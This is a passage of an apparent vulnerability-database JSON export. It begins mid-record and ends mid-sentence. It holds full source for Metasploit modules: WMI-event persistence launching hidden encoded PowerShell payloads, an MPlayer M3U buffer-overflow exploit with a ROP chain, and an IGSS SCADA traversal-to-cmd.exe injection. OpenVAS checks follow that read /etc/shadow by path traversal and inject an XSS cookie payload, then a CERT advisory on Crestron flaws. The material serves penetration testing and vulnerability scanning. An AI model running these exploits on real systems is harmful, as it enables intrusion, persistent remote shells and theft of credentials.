It is also recommended not to use stageless payloads due to powershell script length limitations.\n },\n 'Author' => ['Nick Tyrer <@NickTyrer>'],\n 'License' => MSF_LICENSE,\n 'Privileged' => true,\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'Targets' => [['Windows', {}]],\n 'DisclosureDate' => 'Jun 6 2017',\n 'DefaultTarget' => 0,\n 'DefaultOptions' =>\n {\n 'DisablePayloadHandler' => 'true'\n },\n 'References' => [\n ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'],\n ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/']\n ]\n ))\n\n register_options([\n OptEnum.new('PERSISTENCE_METHOD',\n [true, 'Method to trigger the payload.', 'EVENT', ['EVENT','INTERVAL','LOGON','PROCESS', 'WAITFOR']]),\n OptInt.new('EVENT_ID_TRIGGER',\n [true, 'Event ID to trigger the payload. (Default: 4625)', 4625]),\n OptString.new('USERNAME_TRIGGER',\n [true, 'The username to trigger the payload. (Default: BOB)', 'BOB' ]),\n OptString.new('PROCESS_TRIGGER',\n [true, 'The process name to trigger the payload. (Default: CALC.EXE)', 'CALC.EXE' ]),\n OptString.new('WAITFOR_TRIGGER',\n [true, 'The word to trigger the payload. (Default: CALL)', 'CALL' ]),\n OptInt.new('CALLBACK_INTERVAL',\n [true, 'Time between callbacks (In milliseconds). (Default: 1800000).', 1800000 ]),\n OptString.new('CLASSNAME',\n [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ])\n ])\n\n register_advanced_options(\n [\n OptString.new('CUSTOM_PS_COMMAND',\n [false, 'Custom powershell command to run once the trigger is activated. 
(Note: some commands will need to be enclosed in quotes)', false, ]),\n ])\n end\n\n\n def exploit\n unless have_powershell?\n print_error(\"This module requires powershell to run\")\n return\n end\n\n unless is_admin?\n print_error(\"This module requires admin privs to run\")\n return\n end\n\n unless is_high_integrity?\n print_error(\"This module requires UAC to be bypassed first\")\n return\n end\n\n if is_system?\n print_error(\"This module cannot run as System\")\n return\n end\n\n host = session.session_host\n print_status('Installing Persistence...')\n\n case datastore['PERSISTENCE_METHOD']\n when 'LOGON'\n psh_exec(subscription_logon)\n print_good \"Persistence installed!\"\n remove_persistence\n when 'INTERVAL'\n psh_exec(subscription_interval)\n print_good \"Persistence installed!\"\n remove_persistence\n when 'EVENT'\n psh_exec(subscription_event)\n print_good \"Persistence installed! Call a shell using \\\"smbclient \\\\\\\\\\\\\\\\#{host}\\\\\\\\C$ -U \"+datastore['USERNAME_TRIGGER']+\" <arbitrary password>\\\"\"\n remove_persistence\n when 'PROCESS'\n psh_exec(subscription_process)\n print_good \"Persistence installed!\"\n remove_persistence\n when 'WAITFOR'\n psh_exec(subscription_waitfor)\n print_good \"Persistence installed! 
Call a shell using \\\"waitfor.exe /S #{host} /SI \"+datastore['WAITFOR_TRIGGER']+\"\\\"\"\n remove_persistence\n end\n end\n\n\n def build_payload\n if datastore['CUSTOM_PS_COMMAND']\n script_in = datastore['CUSTOM_PS_COMMAND']\n compressed_script = compress_script(script_in, eof = nil)\n encoded_script = encode_script(compressed_script, eof = nil)\n generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script)\n else\n cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)\n end\n end\n\n\n def subscription_logon\n command = build_payload\n class_name = datastore['CLASSNAME']\n <<-HEREDOC\n $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \\\"#{class_name}\\\"; Query = \\\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\\\"; QueryLanguage = 'WQL'}\n $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \\\"#{class_name}\\\"; CommandLineTemplate = \\\"#{command}\\\"}\n $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}\n HEREDOC\n end\n\n\n def subscription_interval\n command = build_payload\n class_name = datastore['CLASSNAME']\n callback_interval = datastore['CALLBACK_INTERVAL']\n <<-HEREDOC\n $timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \\\"Trigger\\\"}\n $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \\\"#{class_name}\\\"; Query = \\\"Select * FROM __TimerEvent WHERE TimerID 
= 'trigger'\\\"; QueryLanguage = 'WQL'}\n $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \\\"#{class_name}\\\"; CommandLineTemplate = \\\"#{command}\\\"}\n $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}\n HEREDOC\n end\n\n\n def subscription_event\n command = build_payload\n event_id = datastore['EVENT_ID_TRIGGER']\n username = datastore['USERNAME_TRIGGER']\n class_name = datastore['CLASSNAME']\n <<-HEREDOC\n $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \\\"#{class_name}\\\"; Query = \\\"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' AND Targetinstance.EventCode = '#{event_id}' And Targetinstance.Message Like '%#{username}%'\\\"; QueryLanguage = 'WQL'}\n $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \\\"#{class_name}\\\"; CommandLineTemplate = \\\"#{command}\\\"}\n $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}\n HEREDOC\n end\n\n\n def subscription_process\n command = build_payload\n class_name = datastore['CLASSNAME']\n process_name = datastore['PROCESS_TRIGGER']\n <<-HEREDOC\n $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \\\"#{class_name}\\\"; Query = \\\"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName= '#{process_name}'\\\"; QueryLanguage = 'WQL'}\n $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \\\"#{class_name}\\\"; CommandLineTemplate = \\\"#{command}\\\"}\n $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class 
__FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}\n HEREDOC\n end\n\n\n def subscription_waitfor\n command = build_payload\n word = datastore['WAITFOR_TRIGGER']\n class_name = datastore['CLASSNAME']\n <<-HEREDOC\n $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \\\"#{class_name}\\\"; Query = \\\"SELECT * FROM __InstanceDeletionEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_Process' AND Targetinstance.Name = 'waitfor.exe'\\\"; QueryLanguage = 'WQL'}\n $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \\\"#{class_name}\\\"; CommandLineTemplate = \\\"cmd.exe /C waitfor.exe #{word} && #{command} && taskkill /F /IM cmd.exe\\\"}\n $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}\n $filter1 = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \\\"Telemetrics\\\"; Query = \\\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\\\"; QueryLanguage = 'WQL'}\n $consumer1 = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \\\"Telemetrics\\\"; CommandLineTemplate = \\\"waitfor.exe #{word}\\\"}\n $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter1; Consumer = $Consumer1}\n Start-Process -FilePath waitfor.exe #{word} -NoNewWindow\n HEREDOC\n end\n\n\n def log_file\n host = session.session_host\n filenameinfo = \"_\" + ::Time.now.strftime(\"%Y%m%d.%M%S\")\n logs = ::File.join(Msf::Config.log_directory, 'wmi_persistence',\n Rex::FileUtils.clean_path(host + filenameinfo))\n 
::FileUtils.mkdir_p(logs)\n logfile = ::File.join(logs, Rex::FileUtils.clean_path(host + filenameinfo) + '.rc')\n end\n\n\n def remove_persistence\n name_class = datastore['CLASSNAME']\n clean_rc = log_file\n if datastore['PERSISTENCE_METHOD'] == \"WAITFOR\"\n clean_up_rc = \"\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH __EventFilter WHERE Name=\\\\\\\"Telemetrics\\\\\\\" DELETE\\\"\\n\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH CommandLineEventConsumer WHERE Name=\\\\\\\"Telemetrics\\\\\\\" DELETE\\\"\\n\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\\\\\"Telemetrics\\\\\\\"' DELETE\\\"\\n\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH __EventFilter WHERE Name=\\\\\\\"#{name_class}\\\\\\\" DELETE\\\"\\n\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH CommandLineEventConsumer WHERE Name=\\\\\\\"#{name_class}\\\\\\\" DELETE\\\"\\n\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\\\\\"#{name_class}\\\\\\\"' DELETE\\\"\"\n else\n clean_up_rc = \"\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH __EventFilter WHERE Name=\\\\\\\"#{name_class}\\\\\\\" DELETE\\\"\\n\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH CommandLineEventConsumer WHERE Name=\\\\\\\"#{name_class}\\\\\\\" DELETE\\\"\\n\"\n clean_up_rc << \"execute -H -f wmic -a 
\\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\\\\\"#{name_class}\\\\\\\"' DELETE\\\"\"\n end\n file_local_write(clean_rc, clean_up_rc)\n print_status(\"Clean up Meterpreter RC file: #{clean_rc}\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/wmi_persistence.rb"}, {"lastseen": "2019-12-09T05:46:42", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability in MPlayer Lite r33064, caused by improper bounds checking of an URL entry. By persuading the victim to open a specially-crafted .M3U file, specifically by drag-and-dropping it to the player, a remote attacker can execute arbitrary code on the system.\n", "modified": "2017-07-24T13:26:21", "published": "2014-01-24T00:48:21", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/MPLAYER_M3U_BOF", "href": "", "type": "metasploit", "title": "MPlayer Lite M3U Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MPlayer Lite M3U Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability in\n MPlayer Lite r33064, caused by improper bounds checking of an URL entry.\n\n By persuading the victim to open a specially-crafted .M3U file, specifically by\n drag-and-dropping it to the player, a remote attacker can execute arbitrary\n code on the system.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'C4SS!0 and h1ch4m', # Vulnerability discovery and original exploit\n 'Gabor Seljan', # Metasploit module\n ],\n 
'References' =>\n [\n [ 'BID', '46926' ],\n [ 'EDB', '17013' ],\n [ 'URL', 'http://www.mplayer-ww.com/eng/' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x20\\x0d\\x0a\\x1a\\x2c\\x2e\\x26\\x2f\\x3a\\x3e\\x3f\\x5c\",\n 'Space' => 5040\n },\n 'Targets' =>\n [\n [ 'Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064',\n {\n 'Offset' => 21,\n 'Ret' => 0x649a7bbe # ADD ESP,64C # PPPR [avformat-52.dll]\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Mar 19 2011',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])\n ],\n self.class)\n\n end\n\n def junk\n return rand_text_alpha(4).unpack(\"V\").first\n end\n\n def nops\n return make_nops(4).unpack(\"V\").first\n end\n\n def exploit\n\n # ROP chain generated by mona.py - See corelan.be\n rop_gadgets =\n [\n 0x6ad9d85d, # POP EBP # RETN [avcodec-52.dll]\n 0x10018fc3, # &CALL ESP [unrar.dll]\n 0x64984a70, # POP EAX # RETN [avformat-52.dll]\n 0xffffec4f, # Value to negate, will become 0x00005040\n 0x6b0ce791, # NEG EAX # RETN [avcodec-52.dll]\n 0x6b063c7d, # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN [avcodec-52.dll]\n junk,\n junk,\n 0x1001d154, # POP EAX # RETN [unrar.dll]\n 0x77e71210, # &VirtualProtect() [IAT RPCRT4.dll]\n 0x64987f7f, # MOV EAX,DWORD PTR DS:[EAX] # RETN [avformat-52.dll]\n 0x6afcdc68, # XCHG EAX,ESI # RETN [avcodec-52.dll]\n 0x6b02836d, # POP EAX # RETN [avcodec-52.dll]\n 0xffffffc0, # Value to negate, will become 0x00000040\n 0x6b0ce791, # NEG EAX # RETN [avcodec-52.dll]\n 0x6af79d80, # XCHG EAX,EDX # RETN [avcodec-52.dll]\n 0x1001bad6, # POP ECX # RETN [unrar.dll]\n 0x649eab48, # &Writable location [avformat-52.dll]\n 0x6d7c0bb7, # POP EDI # RETN [swscale-0.dll]\n 0x6b03d722, # RETN (ROP NOP) [avcodec-52.dll]\n 0x64984a70, # POP EAX # RETN [avformat-52.dll]\n nops,\n 0x6d7c57d1 # PUSHAD # RETN [swscale-0.dll]\n ].flatten.pack('V*')\n\n 
sploit = rand_text_alpha_upper(target['Offset'])\n sploit << rop_gadgets\n sploit << payload.encoded\n sploit << generate_seh_record(target.ret)\n sploit << rand_text_alpha_upper(1000) # Generate exception\n\n # Create the file\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n file_create(\"http://\" + sploit)\n\n end\nend\n\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/mplayer_m3u_bof.rb"}, {"lastseen": "2019-12-06T23:26:26", "bulletinFamily": "exploit", "description": "This module abuses a directory traversal flaw in Interactive Graphical SCADA System v9.00. In conjunction with the traversal flaw, if opcode 0x17 is sent to the dc.exe process, an attacker may be able to execute arbitrary system commands.\n", "modified": "2017-07-24T13:26:21", "published": "2013-10-17T19:07:27", "id": "MSF:EXPLOIT/WINDOWS/SCADA/IGSS_EXEC_17", "href": "", "type": "metasploit", "title": "Interactive Graphical SCADA System Remote Command Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Interactive Graphical SCADA System Remote Command Injection',\n 'Description' => %q{\n This module abuses a directory traversal flaw in Interactive\n Graphical SCADA System v9.00. 
In conjunction with the traversal\n flaw, if opcode 0x17 is sent to the dc.exe process, an attacker\n may be able to execute arbitrary system commands.\n },\n 'Author' =>\n [\n 'Luigi Auriemma',\n 'MC'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-1566'],\n [ 'OSVDB', '72349'],\n [ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],\n ],\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'Space' => 153,\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n [ 'Windows', {} ]\n ],\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => 'Mar 21 2011'))\n\n register_options(\n [\n Opt::RPORT(12397)\n ])\n end\n\n def exploit\n\n print_status(\"Sending exploit packet...\")\n\n connect\n\n packet = [0x00000100].pack('V') + [0x00000000].pack('V')\n packet << [0x00000100].pack('V') + [0x00000017].pack('V')\n packet << [0x00000000].pack('V') + [0x00000000].pack('V')\n packet << [0x00000000].pack('V') + [0x00000000].pack('V')\n packet << [0x00000000].pack('V') + [0x00000000].pack('V')\n packet << [0x00000000].pack('V')\n packet << \"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\\"\n packet << \"windows\\\\system32\\\\cmd.exe\\\" /c #{payload.encoded}\"\n packet << \"\\x00\" * (143) #\n\n sock.put(packet)\n sock.get_once(-1,0.5)\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/scada/igss_exec_17.rb"}], "openvas": [{"lastseen": "2019-05-29T18:35:36", "bulletinFamily": "scanner", "description": "Crestron AirMedia AM-100 is prone to multiple vulnerabilities.", "modified": "2018-10-18T00:00:00", "published": "2016-11-23T00:00:00", "id": "OPENVAS:1361412562310106410", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106410", "title": "Crestron AirMedia AM-100 Multiple Vulnerabilities", "type": "openvas", "sourceData": 
"##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_crestron_mult_vuln.nasl 11949 2018-10-18 06:44:50Z cfischer $\n#\n# Crestron AirMedia AM-100 Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106410\");\n script_version(\"$Revision: 11949 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-18 08:44:50 +0200 (Thu, 18 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-23 12:47:24 +0700 (Wed, 23 Nov 2016)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2016-5639\", \"CVE-2016-5640\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Crestron AirMedia AM-100 Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n 
script_family(\"Web application abuses\");\n script_dependencies(\"sw_lighttpd_detect.nasl\");\n script_mandatory_keys(\"lighttpd/installed\");\n\n script_tag(name:\"summary\", value:\"Crestron AirMedia AM-100 is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Tries to conduct a directory traversal attack.\");\n\n script_tag(name:\"insight\", value:\"Crestron AirMedia AM-100 is prone to multiple vulnerabilities:\n\n - Directory traversal vulnerability in cgi-bin/login.cgi.\n\n - Hidden Management Console with hardcoded default credentials\n\n - Hardcoded credentials.\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated attacker may read arbitrary system files or login\n with hardcoded credentials.\");\n\n script_tag(name:\"affected\", value:\"Firmware Versions v1.1.1.11 - v1.2.1.\");\n\n script_tag(name:\"solution\", value:\"Update to version 1.4.0.13 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/40813/\");\n script_xref(name:\"URL\", value:\"https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-001.md\");\n script_xref(name:\"URL\", value:\"https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-002.md\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: \"cpe:/a:lighttpd:lighttpd\"))\n exit(0);\n\nurl = \"/cgi-bin/login.cgi?lang=en&src=AwLoginDownload.html\";\nreq = http_get(port: port, item: url);\nres = http_keepalive_send_recv(port: port, data: req);\n\nif (\"<title>Crestron AirMedia</title>\" >< res && \"Device Administration\" >< res &&\n \"Download AirMedia Utility Software\" >< res) {\n trav = \"/cgi-bin/login.cgi?lang=en&src=../../../../../../../../../../../../../../../../../../../../etc/shadow\";\n if (http_vuln_check(port: port, url: trav, pattern: \"root:.*:0:0:99999:7:::\", check_header: TRUE)) {\n report = report_vuln_url(port: 
port, url: trav);\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-13T20:22:00", "bulletinFamily": "scanner", "description": "This host is running Gnew and is prone to multiple vulnerabilities", "modified": "2019-11-12T00:00:00", "published": "2013-10-17T00:00:00", "id": "OPENVAS:1361412562310804110", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804110", "title": "Gnew Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Gnew Multiple Vulnerabilities\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804110\");\n script_version(\"2019-11-12T09:49:27+0000\");\n script_cve_id(\"CVE-2013-5639\", \"CVE-2013-5640\", \"CVE-2013-7349\", \"CVE-2013-7368\");\n script_bugtraq_id(62817, 62818);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-12 09:49:27 +0000 (Tue, 12 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-10-17 14:49:54 +0530 (Thu, 17 Oct 2013)\");\n script_name(\"Gnew Multiple Vulnerabilities\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute arbitrary HTML\n script code in a user's browser session in the context of an affected site,\n and inject or manipulate SQL queries in the back-end database, allowing\n for the manipulation or disclosure of arbitrary data.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted exploit string via HTTP POST request and check whether it\n is able to read cookie or not.\");\n script_tag(name:\"insight\", value:\"Multiple flaws in Gnew exists due to,\n\n - Insufficient filtration of 'friend_email' HTTP POST parameter passed to\n /news/send.php and users/password.php scripts, 'user_email' HTTP POST\n parameter passed to /users/register.php script, 'news_id' HTTP POST parameter\n passed to news/send.php script, 'thread_id' HTTP POST parameter passed to\n posts/edit.php script, 'story_id' HTTP POST parameter passed to\n comments/index.php script, 'answer_id' and 'question_id' HTTP POST parameters\n passed to 
polls/vote.php script, 'category_id' HTTP POST parameter passed to\n news/submit.php script, 'post_subject' and 'thread_id' HTTP POST parameters\n passed to posts/edit.php script.\n\n - Insufficient validation of user-supplied input passed via the 'gnew_language'\n cookie to /users/login.php script.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"summary\", value:\"This host is running Gnew and is prone to multiple vulnerabilities\");\n script_tag(name:\"affected\", value:\"Gnew version 2013.1, Other versions may also be affected.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/54466\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Oct/7\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/28684\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/123482\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\ngnPort = get_http_port(default:80);\n\nif(!can_host_php(port:gnPort)){\n exit(0);\n}\n\nhost = http_host_name(port:gnPort);\n\nforeach dir (make_list_unique(\"/\", \"/gnew\", \"/cms\", cgi_dirs(port:gnPort)))\n{\n\n if(dir == \"/\") dir = \"\";\n\n if(http_vuln_check(port:gnPort, url: dir + 
\"/news/index.php\",\n check_header: TRUE, pattern:\">Gnew<\"))\n {\n postdata = \"send=1&user_name=username&user_email=a%40b.com&friend_email=c@d.com&news_id=-1'\" +\n \"<script>alert(document.cookie);</script>\";\n\n url = dir + \"/news/send.php\";\n req = string(\"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\\r\\n\",\n postdata);\n\n res = http_keepalive_send_recv(port:gnPort, data:req);\n\n if(res =~ \"HTTP/1\\.. 200\" && \"<script>alert(document.cookie);</script>\" >< res)\n {\n report = report_vuln_url( port:gnPort, url:url );\n security_message(port:gnPort, data:report);\n exit(0);\n }\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2019-10-09T19:49:36", "bulletinFamily": "info", "description": "### Overview \n\nThe Crestron AirMedia AM-100 with firmware prior to version 1.4.0.13 is vulnerable to path traversal and command injection.\n\n### Description \n\n[**CWE-22**](<http://cwe.mitre.org/data/definitions/22.html>)**: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') - **CVE-2016-5639\n\n \nA path traversal vulnerability exists in `login.cgi` (and possibly other binaries in the `/home/boa/cgi-bin` directory) on the AM-100 embedded web server. The `src` GET parameter passed to `login.cgi` specifies the relative path to a file for rendering, such as `AwLoginDownload.html`. However, the value of this parameter can specify an arbitrary path on the AM-100 filesystem. \n \n[**CWE-77**](<http://cwe.mitre.org/data/definitions/77.html>)**: Improper Neutralization of Special Elements used in a Command ('Command Injection') - **CVE-2016-5640 \n \nA command injection vulnerability exists in `rftest.cgi` on the AM-100 embedded web server. The ATE_COMMAND POST parameter specifies the path to a command for the underlying OS to 